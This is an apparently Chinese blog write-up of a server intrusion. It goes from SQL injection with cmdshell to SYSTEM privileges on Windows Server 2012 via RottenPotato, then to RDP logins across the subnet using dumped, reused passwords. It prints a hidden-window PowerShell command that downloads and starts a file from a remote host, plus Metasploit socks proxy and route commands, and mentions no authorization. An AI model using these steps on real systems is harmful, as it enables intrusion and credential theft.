一次从注入到win2012提权的故事

热度:947℃ 评论:0 发布时间:2018-07-23 收录:已收录

偶遇一个注入,权限还是蛮大的,至少执行cmdshell是没问题的,因为这是一台数据库服务器,和目标站是站库分离,又在内网中,所以没办法拿下shell。
我想得到内网环境,继续内网渗透,可是在用sqlmap上传的过程中发现始终无法上传....

一次从注入到win2012提权的故事

powershell 远程下载文件+MSF监听

没错,就是通过powershell 远程下载文件,没法上传,我们就下载,命令很简单:

powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://xxx.xx.com/1.txt','C:\Windows\Tasks\23.txt');start-process 

1.寻找可读可写目录
一次从注入到win2012提权的故事
一次从注入到win2012提权的故事
2.MSF设置好监听
一次从注入到win2012提权的故事
3.确认文件远程下载成功,然后执行
一次从注入到win2012提权的故事
4.MSF成功上线
一次从注入到win2012提权的故事

提权之EXP砸不动肿么办?

本来吧,我一直以为是win2008的。。原谅我没仔细看。。。
在搞定上传问题之后,就准备转发内网出来上服务器了,但是呢,首先咱得有个账号不是?那么就需要提权了。。。
经过半天的powershell 远程下载EXP,一堆EXP砸上去发现毫无反应,what?
然后果断systeminfo看下补丁。。。结果震惊的发现居然是win2012的系统?。。。。
一次从注入到win2012提权的故事
去土司搜了下win2012提权,找到一篇文章:WinServer2012提权:实验RottenPotato(烂土豆)+Metasploit
正巧meterpreter我已经建立了,这是缺啥来啥啊,一点都不拐弯抹角。。。。根据文中给出的方法一步步做,这里不多说,直接看图:
一次从注入到win2012提权的故事
use incognito过后,我直接就列出来NT AUTHORITY\SYSTEM的令牌了,因此省去了后面的一些步骤。
感谢@了凡四训 大牛的文章,让我第一次发现win2012提权居然可以如此简单?
接下来就是getpass,然后转发3389,上服务器了。

内网转发的困扰

服务器上没有站点,所以reGeorg-master的转发脚本全部用不了,我本机是内网,目标也是内网。。NC也不行。。。该怎么办呢?。。。
很多端口转发工具我都没用过,因为很少搞内网。。。
强调一下,我MSF是在外网的centos上面,所以MSF可以反弹成功,另外通过msf代理的下来的话毫无作用,我是想代理到我本机,我的电脑内网,目标内网,是这么个情况。
需要exe格式,还需要支持双内网,真心想不到什么工具了。
瞬间陷入死胡同,容我静静。

峰回路转,幸福来的太突然

就在我不知道该怎么办好的时候,突然脑子灵光一闪,瞬间思路来了。
1.首先,他是有外网IP的
一次从注入到win2012提权的故事
2.之前通过meterpreter的system权限shell,getpass了密码
3.思路就是,扫C段中的3389端口,尝试登陆
一次从注入到win2012提权的故事
然后。。我就神奇的进来了。。。。
一次从注入到win2012提权的故事
接下来,就简单了,数据库密码通杀,3389密码通杀,有了跳板,内网真的不在是内网了。
最后,补充一点,注入点那个服务器,哪怕他有外网IP,但是没放行,所有端口全在内网,所以也不可能直接3389链接登录了。
至此本次渗透结束。

补充:

感谢土司各位大佬的帮助,没怎么研究过MSF,对MSF不熟悉,原来还可以利用MSF开代理,然后本机链接代理的操作。

msf开了代理 用Proxifier 这个软件填你vpsip+代理端口 添加你要代理的程序 比如mstsc..firefox 你代理的本地程序就走代理流量了。

msf > use auxiliary/server/socks4a 
msf auxiliary(socks4a) > set SRVPORT 443 
SRVPORT => 443
msf auxiliary(socks4a) > exploit 
route add 192.168.0.0 255.255.0.0 sesseion id 

(这里路由根据内网情况自己设置吧也可以直接设置0.0.0.0 .......)

打赏
本文由 Mr.Wu 创作,除注明转载/出处外,均为本站原创,转载前请注明出处!

发表评论

电子邮件地址不会被公开。 必填项已用*标注

顶部
护眼
搜索
分享